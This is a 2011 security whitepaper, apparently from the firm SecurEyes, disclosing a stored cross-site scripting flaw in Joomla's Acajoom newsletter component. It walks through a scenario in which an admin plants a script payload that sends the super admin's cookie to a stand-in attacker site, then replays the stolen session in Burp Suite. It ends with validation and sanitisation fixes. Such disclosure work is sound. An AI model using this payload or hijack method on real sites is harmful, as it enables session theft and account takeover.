Cross Site Scripting in Joomla Acajoom Component

Similar documents
Check list for web developers

Exploiting Local File Inclusion in A Co-Hosting Environment

Magento Security and Vulnerabilities. Roman Stepanov

Web Application Security

Where every interaction matters.

ArcGIS Server Security Threats & Best Practices David Cordes Michael Young

CS 558 Internet Systems and Technologies

Cyber Security Workshop Ethical Web Hacking

WEB SECURITY CONCERNS THAT WEB VULNERABILITY SCANNING CAN IDENTIFY

Bug Report. Date: March 19, 2011 Reporter: Chris Jarabek

Introduction:... 1 Security in SDLC:... 2 Penetration Testing Methodology: Case Study... 3

Web applications. Web security: web basics. HTTP requests. URLs. GET request. Myrto Arapinis School of Informatics University of Edinburgh

EVALUATING COMMERCIAL WEB APPLICATION SECURITY. By Aaron Parke

What is Web Security? Motivation

(WAPT) Web Application Penetration Testing

HTTP Response Splitting

SECURITY ADVISORY. December 2008 Barracuda Load Balancer admin login Cross-site Scripting

Web Vulnerability Assessment Report

Attack and Penetration Testing 101

A Server and Browser-Transparent CSRF Defense for Web 2.0 Applications. Slides by Connor Schnaith

Criteria for web application security check. Version

Hack Proof Your Webapps

Webapps Vulnerability Report

FINAL DoIT v.4 PAYMENT CARD INDUSTRY DATA SECURITY STANDARDS APPLICATION DEVELOPMENT AND MAINTENANCE PROCEDURES

Web application security

How to break in. Tecniche avanzate di pen testing in ambito Web Application, Internal Network and Social Engineering

Recommended Practice Case Study: Cross-Site Scripting. February 2007

OWASP Top Ten Tools and Tactics

The purpose of this report is to educate our prospective clients about capabilities of Hackers Locked.

Is Drupal secure? A high-level perspective on web vulnerabilities, Drupal s solutions, and how to maintain site security

Intrusion detection for web applications

Web Application Penetration Testing

WHITE PAPER. FortiWeb and the OWASP Top 10 Mitigating the most dangerous application security threats

Guidelines for Web applications protection with dedicated Web Application Firewall

Web Application Vulnerability Testing with Nessus

The Top Web Application Attacks: Are you vulnerable?

ASL IT SECURITY BEGINNERS WEB HACKING AND EXPLOITATION

Detecting Web Application Vulnerabilities Using Open Source Means. OWASP 3rd Free / Libre / Open Source Software (FLOSS) Conference 27/5/2008

ASP.NET MVC Secure Coding 4-Day hands on Course. Course Syllabus

Secure Web Development Teaching Modules 1. Threat Assessment

Cross-Site Scripting

Web Application Security. Vulnerabilities, Weakness and Countermeasures. Massimo Cotelli CISSP. Secure

An Insight into Cookie Security

Web Application Security Considerations

BASELINE SECURITY TEST PLAN FOR EDUCATIONAL WEB AND MOBILE APPLICATIONS

Hardening Moodle. Concept and Realization of a Security Component in Moodle. a project by

Network Security Testing using MMT: A case study in IDOLE project

Application Security Testing. Generic Test Strategy

MWR InfoSecurity Security Advisory. BT Home Hub SSID Script Injection Vulnerability. 10 th May Contents

Secure Web Application Coding Team Introductory Meeting December 1, :00 2:00PM Bits & Pieces Room, Sansom West Room 306 Agenda

Security features of ZK Framework

Gateway Apps - Security Summary SECURITY SUMMARY

Penetration Test Report

Network Security Web Security

Common Security Vulnerabilities in Online Payment Systems

Sitefinity Security and Best Practices

Six Essential Elements of Web Application Security. Cost Effective Strategies for Defending Your Business

3. Broken Account and Session Management. 4. Cross-Site Scripting (XSS) Flaws. Web browsers execute code sent from websites. Account Management

WEB ATTACKS AND COUNTERMEASURES

JOOMLA SECURITY. ireland website design. by Oliver Hummel. ADDRESS Unit 12D, Six Cross Roads Business Park, Waterford City

Data Breaches and Web Servers: The Giant Sucking Sound

Detecting and Exploiting XSS with Xenotix XSS Exploit Framework

Client Side Filter Enhancement using Web Proxy

Network Security Exercise #8

Using Foundstone CookieDigger to Analyze Web Session Management

WHITE PAPER FORTIWEB WEB APPLICATION FIREWALL. Ensuring Compliance for PCI DSS 6.5 and 6.6

Nuclear Regulatory Commission Computer Security Office Computer Security Standard

Acunetix Web Vulnerability Scanner. Getting Started. By Acunetix Ltd.

ASL IT Security Advanced Web Exploitation Kung Fu V2.0

Bank Hacking Live! Ofer Maor CTO, Hacktics Ltd. ATC-4, 12 Jun 2006, 4:30PM

SAP: Session (Fixation) Attacks and Protections

Web Application Security Assessment and Vulnerability Mitigation Tests

HackMiami Web Application Scanner 2013 PwnOff

Web Application Hacking (Penetration Testing) 5-day Hands-On Course

WHITE PAPER. FortiWeb Web Application Firewall Ensuring Compliance for PCI DSS 6.5 and 6.6

Web Application Security Guidelines for Hosting Dynamic Websites on NIC Servers

SQL INJECTION IN MYSQL

Application Layer Encryption: Protecting against Application Logic and Session Theft Attacks. Whitepaper

Thick Client Application Security

Essential IT Security Testing

Cross-site site Scripting Attacks on Android WebView

Using Free Tools To Test Web Application Security

OWASP AND APPLICATION SECURITY

Integrating Security Testing into Quality Control

Web Application Firewall on SonicWALL SSL VPN

National Information Security Group The Top Web Application Hack Attacks. Danny Allan Director, Security Research

Members of the UK cyber security forum. Soteria Health Check. A Cyber Security Health Check for SAP systems

Secure Web Development Teaching Modules 1. Security Testing. 1.1 Security Practices for Software Verification

Hack Yourself First. Troy troyhunt.com

elearning for Secure Application Development

Top Ten Web Application Vulnerabilities in J2EE. Vincent Partington and Eelco Klaver Xebia

Load testing with. WAPT Cloud. Quick Start Guide

Network Monitoring using MMT:

Breaking Web Applications in Shared Hosting Environments. Nick Nikiforakis Katholieke Universiteit Leuven

Semantic based Web Application Firewall (SWAF V 1.6) Operations and User Manual. Document Version 1.0

CSE598i - Web 2.0 Security OWASP Top 10: The Ten Most Critical Web Application Security Vulnerabilities

Transcription:

Whitepaper Cross Site Scripting in Joomla Acajoom Component Vandan Joshi December 2011

TABLE OF CONTENTS Abstract... 3 Introduction... 3 A Likely Scenario... 5 The Exploit... 9 The Impact... 12 Recommended Solutions... 12 About Author... 13 About SecurEyes... 13

Abstract XSS vulnerability has been detected in the popular Acajoom component of Joomla. An attacker can hijack the Joomla s super admin role user s account by exploiting this weakness. Introduction Joomla Joomla is a popular free open source Content Management System managed by Joomla Foundation. It is a community-driven CMS allowing users to install third-party developed components and extensions. While this makes Joomla a feature-rich and dynamic CMS, it also introduces vulnerabilities like XSS and SQL injection in the overall framework. Acajoom Acajoom is a popular Joomla component used for sending newsletters to subscribed users. It is easy to configure and use, allowing users to include their designs, like image embedding and HTML editing, in itself.

Screenshot of Acajoom 5.1.5 XSS Vulnerability Cross site scripting (XSS) attacks are considered one of the most dangerous attacks. When an application accepts un-validated user inputs and sends it back to the browser without validation, it provides attackers with an opportunity to execute malicious scripts in victim users browsers. By using this attack vector, malicious users can hijack user accounts, deface websites, carry out phishing attacks etc. XSS attacks can be broadly categorized as stored and reflected. In reflected XSS attack, injected malicious inputs are reflected back from a vulnerable application. Typically, an attacker lures a victim into clicking on a link which contains the scripts as URL parameter values. These scripts are then reflected back and executed on the victim s browser. In stored XSS attack, attackers store malicious scripts in the application through vulnerable pages. These scripts get executed when victim users access vulnerable pages where these scripts are stored.

Joomla 1.5.18 Acajoom stored cross site scripting vulnerability The following sections present the vulnerability of the config['sendmail_path'] variable parameter in the Acajoom component. A Likely Scenario Joomla has Admin and Superadmin role users with the Superadmin having higher privileges than the Admin. Consider a scenario where an admin user wants to gain access to the super admin functionality. One of the ways to achieve this is to gain access to the session ID of the super admin by way of an XSS attack. Presented below is a step-by-step description of how the above scenario can be done using the XSS vulnerability in the Joomla Acajoom component. Step 1: A malicious Admin user browses to the page at the URL: http://www.vulnerable123.com/test/administrator/index.php and enters his credentials.

Step 2: The vulnerable page of the Acajoom component is at the URL: http://www.vulnerable123.com/test/administrator/index.php?option=com_acajoom &act=configuration Step 3: He injects malicious XSS vector in send mail path parameter "<script>document.location="http://www.attacker123.com/cookie.php?c= " + document.cookie</script> Malicious vector

Step 5: Then he clicks on save button as shown. Step 6: The malicious user logs out from the application after saving the configuration.

XSS vector and Cookie.php "<script>document.location="http://www.attacker123.com/cookie.php?c= " + document.cookie</script> 1. Here www.attacker123.com is the site maintained by the attacker. 2. cookie.php is a file where a code is written to extract the value of the GET parameter c and write the same in a.html file. 3. The file is used to extract user session by the parameter c. 4. It also fetches the IP address and referrer value of the victim s request. 5. The cookie.php file also re-directs the user to the home page of the vulnerable site as defined in the header location so that the user is unknown of the attack. The home page of the site is www.vulenrable123.com/test/administrator/index.php. cookie.php file Cookie.html is the file where cookie value of the user is written along with IP address and Referrer. The header redirects the user to the home page of the vulnerable site so that the victim user is unaware of the attack

The Exploit Step 7: A Super-admin role user browses to the configuration page at http://www.vulnerable123.com/test/administrator/index.php?option=com_acajoom &act=configuration and is shown the home page. The home page Super Admin user is unaware about the attack and in the background; the cookie value gets submitted to www.attacker123.com/cookie.html. Below is the cookie.html file where cookie value of the super admin role user is saved. Cookie.html File www.attacker123.com is the attacker s site The cookie and referrer value of the victim.

Step 8: A malicious user can use this cookie values to gain unauthorized access of the application as a super admin. He enters the internal page at the URL: http://www.vulnerable123.com/test/administrator/index.php and captures the request in an HTTP interceptor. NOTE: A HTTP interceptor is a proxy tool that can capture the data flowing between a browser and a web server. Burp Suite proxy was used during the test. Step 9: A malicious user appends the cookie value in the HTTP interceptor in the request as shown and forwards the request.

Step 10: He can access all functionalities of the super admin role user as shown.

The Impact As described, user sessions can be hijacked through this attack. It can also lead to phishing attacks and defacement of the websites. Recommended Solutions 1. White list validation of all user entered parameters. Accepting only known data in the application is the valid solution; else the error page should be shown. The validation should be performed on client as well as server side. 2. Proper sanitization of the user entered strings should be performed in the application.

About Author Vandan Joshi is an associate information security consultant at SecurEyes. He can be reached at vandan.joshi@secureyes.net About SecurEyes SecurEyes is a Bangalore based firm specializing in IT security. SecurEyes offers a wide range of security services and products to its clients. For more information, visit our website: http://www.secureyes.net

2026 © DocPlayer.net Privacy Policy | Terms of Service | Feedback  | Do Not Sell My Personal Information